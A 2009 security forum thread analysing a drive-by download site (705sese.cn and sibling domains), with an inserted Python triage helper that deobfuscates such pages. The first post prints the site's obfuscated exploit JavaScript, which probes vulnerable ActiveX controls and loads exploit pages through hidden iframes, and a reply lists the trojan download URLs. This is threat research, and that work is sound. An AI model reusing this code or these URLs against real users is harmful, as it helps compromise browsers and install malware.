Author Topic: 705sese.cn (exploits and trojan)  (Read 2920 times)


January 15, 2009, 11:17:43 pm

MysteryFCM

This one was submitted to me via e-mail, and a quick look shows several exploits etc. One of the pages I checked:

Code:
*****************************************************************
vURL Desktop Edition v0.3.7 Results
Source code for: http://www.705sese.cn/a2/fxx.htm
Server IP: 59.34.197.15 [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 0
iFrames: 0
via Proxy: TeMerc Internet Countermeasures (US)
Date: 15 January 2009
Time: 23:12:54:12
*****************************************************************

<Script>
document.write("<Iframe width=100 height=0 src=fx.htm></iframe>");
document.write("");
document.write("<Iframe width=100 height=0 src=../a1/ss.htm></iframe>");
window.status="";
window.onerror=function(){return true;}
if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)
document.write("<Iframe width=100 height=0 src=../a1/Ms06014.htm></iframe>");
try{var m;
var hw=new ActiveXObject("\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x65\x72\x2e\x44\x4c\x6f\x61\x64\x65\x72\x2e\x31");}
catch(m){};
finally{if(m!="[object Error]"){document.write("<Iframe width=100 height=0 src=../a1/sina.htm></iframe>");}}
try{var n;var qxxxxx="dxac";var qxaaxx="aaaac";var povjudgqjx="fsdfvjjt";
var hl=new ActiveXObject("UUUPGRADE.UUUpgradeCtrl.1");}
catch(n){};                     
finally{if(n!="[object Error]"){document.write("Downloader.DLoader.1");
document.write("<Iframe width=100 height=0 src=../a1/no.htm></iframe>");}}var ddddddddd="dddddddddds";
try{var b;
var ml=new ActiveXObject("MPS.StormPlayer");}
catch(b){};                     
finally{if(b!="[object Error]"){document.write("<Iframe width=100 height=0 src=../a1/bfyy.htm></iframe>");}}var sdddd="x";var sdddd="x";
try{var f;
var gw=new ActiveXObject("GLIEDown.IEDown.1");}
catch(f){};                     
finally{var dxl="x";if(f!="[object Error]"){document.write("<Iframe width=100 height=0 src=../a1/GLWORLD.html></iframe>");}}
function test()
{
rrooxx = "IER" + "PCtl.I" + "ERP" + "Ctl.1";
try
{
Like = new ActiveXObject(rrooxx);
}catch(error){return;}
vvvvv = Like.PlayerProperty("PRODUCTVERSION");
if(vvvvv<="\x36\x2e\x30\x2e\x31\x34\x2e\x35\x35\x32"){var ammc="dsvb";
document.write('<iframe style=display:none src="../a1/real.htm"></iframe>');}
else
document.write('<iframe style=display:none src="../a1/real.html"></iframe>');
}
test();
document.write("");document.write("");document.write("");document.write("");var fjd="fdsfsd";abc="dfdae";document.write("");var fkav="BS";var fkasaccv="BS";var fkaqfccv="BS";var fkaqjfccv="BS";var bccv="BS";
</script>
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net
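A small triage helper, added here as an example (it is not code from the thread, from hpHosts or from vURL), showing how an analyst pulls the indicators out of a captured landing page like the one above: it resolves the hex escapes, folds the concatenated ProgID, lists the ActiveX controls the page probes (the try/catch/finally pattern only writes an iframe when the control instantiates, i.e. when it is installed), lists the iframe targets, and flags iframes hidden with height=0 or display:none. SAMPLE is a constructed fragment modelled on the capture; the function and constant names are the example's own.

```python
import re

# Constructed sample modelled on the captured fxx.htm page (not the live code):
# hidden iframes, a hex-escaped ProgID, a concatenated ProgID and a version gate.
SAMPLE = r'''
<Script>
document.write("<Iframe width=100 height=0 src=fx.htm></iframe>");
try{var m;var hw=new ActiveXObject("\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x65\x72\x2e\x44\x4c\x6f\x61\x64\x65\x72\x2e\x31");}catch(m){};
var hl=new ActiveXObject("UUUPGRADE.UUUpgradeCtrl.1");
rrooxx = "IER" + "PCtl.I" + "ERP" + "Ctl.1";
Like = new ActiveXObject(rrooxx);
if(vvvvv<="\x36\x2e\x30\x2e\x31\x34\x2e\x35\x35\x32"){
document.write('<iframe style=display:none src="../a1/real.htm"></iframe>');}
</script>
'''

HEX_ESC = re.compile(r'\\x([0-9a-fA-F]{2})')          # "\x44" style escapes
CONCAT = re.compile(r'"([^"]*)"\s*\+\s*"([^"]*)"')     # "a" + "b"
ASSIGN = re.compile(r'(\w+)\s*=\s*"([^"]*)"\s*;')       # name = "literal";
PROGID = re.compile(r'ActiveXObject\(\s*(?:"([^"]*)"|(\w+))\s*\)')
IFRAME = re.compile(r'<iframe\b([^>]*)>', re.I)
SRC = re.compile(r'\bsrc=["\']?([^\s"\'>]+)', re.I)
VERSION_GATE = re.compile(r'<=\s*"([0-9.]+)"')         # e.g. RealPlayer version test

def deobfuscate(js):
    """Resolve hex escapes, then fold "a" + "b" string concatenations."""
    js = HEX_ESC.sub(lambda m: chr(int(m.group(1), 16)), js)
    prev = None
    while prev != js:                     # repeat until no "a" + "b" pair is left
        prev, js = js, CONCAT.sub(r'"\1\2"', js)
    return js

def triage(html):
    """Return the indicators an analyst wants from a drive-by landing page."""
    js = deobfuscate(html)
    names = dict(ASSIGN.findall(js))      # simple  name = "literal";  assignments
    # A ProgID is either a string literal or a variable holding one.
    progids = [lit or names.get(var, f'<unresolved {var}>')
               for lit, var in PROGID.findall(js)]
    iframes = []
    for attrs in IFRAME.findall(js):
        src = SRC.search(attrs)
        hidden = 'height=0' in attrs or 'display:none' in attrs.replace(' ', '')
        iframes.append((src.group(1) if src else None, hidden))
    return {'progids': progids, 'iframes': iframes,
            'version_gates': VERSION_GATE.findall(js)}

if __name__ == '__main__':
    for key, value in triage(SAMPLE).items():
        print(key, value)
```

Each ProgID and iframe target found this way is a pivot for blocklisting and for checking whether the probed control exists on the estate's standard build.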

January 15, 2009, 11:51:19 pm
Reply #1

SysAdMini

OMG, a lot of exploits.  >:(

Resulting binaries are

Code:
http://d.bc-s350.cn/down/gr.exe
http://d.oixka.com/new/a1.css

Wepawet analysis report
http://wepawet.cs.ucsb.edu/view.php?hash=1989583b93eb6896444a0710208e67b9&t=1232062951&type=js
Ruining the bad guy's day

January 18, 2009, 05:18:02 pm
Reply #2

SysAdMini

Same thing happens at

Code:
http://www.706sese.cn/a8/fxx.htm

And there are more domains like

707sese.cn
708sese.cn
709sese.cn
...
Ruining the bad guy's day

January 19, 2009, 02:47:42 am
Reply #3

MysteryFCM

Seems to be 705-710 thus far :) (fails to resolve < 705 and from 711 onwards)
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net